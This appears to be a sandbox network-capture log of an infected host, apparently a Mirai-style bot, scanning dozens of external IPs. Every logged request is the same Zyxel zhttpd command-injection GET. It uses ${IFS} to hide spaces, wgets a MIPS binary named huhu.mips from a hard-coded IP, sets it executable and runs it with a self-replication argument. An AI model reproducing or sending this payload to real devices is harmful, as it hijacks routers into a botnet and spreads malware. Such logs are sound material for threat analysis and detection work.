                                                        Feb 2, 2024 06:21:03.811232090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2909192.168.2.145248645.133.7.165443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.811260939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2910192.168.2.1451748138.22.150.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.811297894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2911192.168.2.145610866.208.5.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.811336040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2912192.168.2.1435742220.146.50.214443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.811379910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2913192.168.2.145596620.16.38.182443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.811420918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2914192.168.2.1449422114.13.205.118443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.811461926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2915192.168.2.1457140172.173.12.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.811615944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2916192.168.2.1449296147.30.2.29443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.811659098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2917192.168.2.1457594135.20.18.194443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.811705112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2918192.168.2.1438684183.61.91.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.811738968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2919192.168.2.1435780104.147.169.41443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.811763048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2920192.168.2.144447251.220.183.199443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.811811924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2921192.168.2.145019260.46.165.197443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.811858892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2922192.168.2.1448130119.15.135.31443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.811878920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2923192.168.2.143356061.2.144.57443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.811943054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2924192.168.2.144881445.162.38.82443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.811970949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2925192.168.2.1456542142.213.174.36443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.812000990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2926192.168.2.146049684.100.254.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.812036037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2927192.168.2.1446582138.227.229.227443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.812055111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2928192.168.2.1440954176.187.226.199443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.812078953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2929192.168.2.145988053.166.46.52443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.812139988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2930192.168.2.1451010108.1.6.146443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.812165022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2931192.168.2.1436262192.4.71.115443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.812220097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2932192.168.2.1460028119.199.6.111443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.812264919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2933192.168.2.1435646197.138.138.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.812299967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2934192.168.2.1460874167.89.206.251443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.812316895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2935192.168.2.145482442.135.205.65443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.812380075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2936192.168.2.1444824189.254.21.34443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.812427044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2937192.168.2.143725837.142.159.251443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.812449932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2938192.168.2.145296823.102.179.199443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.812500954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2939192.168.2.14528222.217.56.155443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.812537909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2940192.168.2.1459960207.195.206.121443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.812577009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2941192.168.2.1434858200.11.234.50443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.812613964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2942192.168.2.1435632188.111.145.88443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.812642097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2943192.168.2.1437708183.71.238.101443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.812694073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2944192.168.2.145777435.190.248.118443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.812731028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2945192.168.2.1441684137.155.52.254443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.812766075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2946192.168.2.1438504131.178.231.4443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.812789917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2947192.168.2.1444336108.167.50.207443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.812819004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2948192.168.2.145382282.5.212.119443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.812869072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2949192.168.2.145601083.188.105.114443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.812897921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2950192.168.2.1434234184.102.203.29443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.812947035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2951192.168.2.1446910208.220.1.217443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.812978983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2952192.168.2.1457282178.208.32.69443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.813008070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2953192.168.2.145057024.75.147.223443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.813060045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2954192.168.2.1434348166.24.108.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.813092947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2955192.168.2.1447790163.132.218.9443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.813133001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2956192.168.2.1444414154.248.142.74443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.813185930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2957192.168.2.145857288.162.127.125443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.813208103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2958192.168.2.1435970162.167.155.43443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.813246012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2959192.168.2.145494443.52.249.229443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.813272953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2960192.168.2.1436302116.141.130.195443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.813328028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2961192.168.2.143921023.239.112.69443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.813381910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2962192.168.2.145542847.136.253.127443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.813417912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2963192.168.2.1460158184.158.19.124443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.813446999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2964192.168.2.144206834.197.54.118443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.813483953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2965192.168.2.1455386167.248.248.207443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.813539982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2966192.168.2.1447492152.31.202.36443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.813570976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2967192.168.2.144445276.100.153.113443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.813604116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2968192.168.2.14385669.205.115.26443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.813643932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2969192.168.2.144327043.71.236.18443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.813678026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2970192.168.2.14458541.42.216.209443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.813719988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2971192.168.2.146047839.47.227.205443
                                                        TimestampBytes transferredDirectionData
